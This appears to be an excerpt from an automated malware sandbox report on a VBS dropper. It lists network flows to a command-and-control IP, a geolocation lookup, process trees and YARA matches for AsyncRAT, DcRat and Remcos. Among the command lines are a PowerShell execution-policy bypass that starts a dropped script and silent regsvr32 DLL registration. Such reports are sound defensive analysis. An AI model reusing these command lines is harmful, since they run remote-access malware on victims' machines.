Apr 24, 2024 17:05:30.608836889 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:30.654987097 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:31.016954899 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:31.020461082 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:31.434261084 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:31.434386015 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:31.840590954 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:41.956171036 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:42.371726036 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:42.371838093 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:42.735575914 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:42.920522928 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:43.215689898 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:43.215832949 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:43.217377901 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:43.281400919 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:43.281514883 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:43.388142109 CEST | 4444 | 49715 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:43.389396906 CEST | 49715 | 4444 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:43.621488094 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:43.622416019 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:43.793864965 CEST | 4444 | 49715 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:44.027882099 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:44.586863041 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:44.654289007 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:45.016602993 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:45.233062029 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:45.512253046 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:45.512423038 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:54.030632973 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:54.435460091 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:54.435620070 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:54.797209024 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:54.842359066 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:55.203253031 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:55.205682039 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:55.622039080 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:05:55.622136116 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:05:56.028399944 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:06:06.108513117 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:06:06.512456894 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:06:06.512511969 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:06:06.876671076 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:06:07.014163017 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:06:07.371965885 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:06:07.372037888 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:06:07.377212048 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:06:07.377275944 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:06:08.078872919 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:06:08.482409000 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Apr 24, 2024 17:06:08.482527018 CEST | 49704 | 6666 | 192.168.2.5 | 139.99.133.66
Apr 24, 2024 17:06:08.887584925 CEST | 6666 | 49704 | 139.99.133.66 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 24, 2024 17:04:25.255101919 CEST | 58683 | 53 | 192.168.2.5 | 1.1.1.1
Apr 24, 2024 17:04:25.413851023 CEST | 53 | 58683 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 24, 2024 17:04:25.255101919 CEST | 192.168.2.5 | 1.1.1.1 | 0x539b | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 24, 2024 17:04:17.106487036 CEST | 1.1.1.1 | 192.168.2.5 | 0x3940 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 17:04:17.106487036 CEST | 1.1.1.1 | 192.168.2.5 | 0x3940 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 17:04:25.413851023 CEST | 1.1.1.1 | 192.168.2.5 | 0x539b | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 17:05:18.808346033 CEST | 1.1.1.1 | 192.168.2.5 | 0x6e45 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 17:05:18.808346033 CEST | 1.1.1.1 | 192.168.2.5 | 0x6e45 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
                                  • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49716 | 178.237.33.50 | 80 | 3252 | C:\Windows\winhlp32.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 17:04:25.726880074 CEST | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Apr 24, 2024 17:04:26.046205044 CEST | 1173 | IN | HTTP/1.1 200 OK
date: Wed, 24 Apr 2024 15:04:25 GMT
server: Apache
content-length: 965
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4c 61 73 20 56 65 67 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 76 61 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 4e 56 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 76 61 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 38 33 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 33 36 2e 31 36 38 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 31 31 35 2e 31 31 36 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4c 6f 73 5f 41 6e 67 65 6c 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 0a 7d
                                  Data Ascii: { "geoplugin_request":"154.16.105.36", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Las Vegas", "geoplugin_region":"Nevada", "geoplugin_regionCode":"NV", "geoplugin_regionName":"Nevada", "geoplugin_areaCode":"", "geoplugin_dmaCode":"839", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"36.1685", "geoplugin_longitude":"-115.1164", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Los_Angeles", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                  Target ID:0
                                  Start time:17:03:56
                                  Start date:24/04/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs"
                                  Imagebase:0x7ff69b660000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:2
                                  Start time:17:03:57
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\wscript.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\SYSWOW64\WSCRIPT.EXE" //b //e:vbscript "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs"
                                  Imagebase:0x3b0000
                                  File size:147'456 bytes
                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts, Description: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc., Source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy, Description: Detects executables containing the string DcRatBy, Source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts, Description: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc., Source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy, Description: Detects executables containing the string DcRatBy, Source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts, Description: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc., Source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy, Description: Detects executables containing the string DcRatBy, Source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts, Description: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc., Source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy, Description: Detects executables containing the string DcRatBy, Source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:3
                                  Start time:17:03:58
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
                                  Imagebase:0x850000
                                  File size:20'992 bytes
                                  MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:4
                                  Start time:17:03:58
                                  Start date:24/04/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  Imagebase:0xae0000
                                  File size:65'440 bytes
                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_DcRat_2, Description: Yara detected DcRat, Source: 00000004.00000002.3309788726.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000004.00000002.3309788726.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000004.00000002.3316092029.00000000052C6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000004.00000002.3309788726.0000000003118000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000004.00000002.3309788726.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000004.00000002.3306976580.00000000010A1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                  Reputation:high
                                  Has exited:false

                                  Target ID:5
                                  Start time:17:03:58
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
                                  Imagebase:0x850000
                                  File size:20'992 bytes
                                  MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:6
                                  Start time:17:03:59
                                  Start date:24/04/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  Imagebase:0xd30000
                                  File size:65'440 bytes
                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000006.00000002.2078678717.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000002.2077756210.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000006.00000002.2077756210.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  Reputation:high
                                  Has exited:true

                                  Target ID:7
                                  Start time:17:03:59
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
                                  Imagebase:0x850000
                                  File size:20'992 bytes
                                  MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:8
                                  Start time:17:03:59
                                  Start date:24/04/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  Imagebase:0xe10000
                                  File size:65'440 bytes
                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000008.00000002.2081271482.00000000032BA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000008.00000002.2085488605.0000000005756000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000008.00000002.2081271482.00000000032A3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  Reputation:high
                                  Has exited:true

                                  Target ID:9
                                  Start time:17:03:59
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
                                  Imagebase:0x850000
                                  File size:20'992 bytes
                                  MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:10
                                  Start time:17:04:00
                                  Start date:24/04/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  Imagebase:0xac0000
                                  File size:65'440 bytes
                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 0000000A.00000002.2085289507.0000000002CEA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 0000000A.00000002.2085289507.0000000002CD3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  Reputation:high
                                  Has exited:true

                                  Target ID:12
                                  Start time:17:04:15
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' & exit
                                  Imagebase:0x790000
                                  File size:236'544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:13
                                  Start time:17:04:15
                                  Start date:24/04/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6d64d0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:14
                                  Start time:17:04:15
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):true
                                  Commandline:powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"'
                                  Imagebase:0x520000
                                  File size:433'152 bytes
                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:15
                                  Start time:17:04:16
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\wscript.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\remc1.vbs"
                                  Imagebase:0x3b0000
                                  File size:147'456 bytes
                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:16
                                  Start time:17:04:21
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
                                  Imagebase:0x850000
                                  File size:20'992 bytes
                                  MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:17
                                  Start time:17:04:22
                                  Start date:24/04/2024
                                  Path:C:\Windows\winhlp32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\winhlp32.exe"
                                  Imagebase:0x3e0000
                                  File size:11'776 bytes
                                  MD5 hash:0629E6D130F226C009EA9AB329F37ACC
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
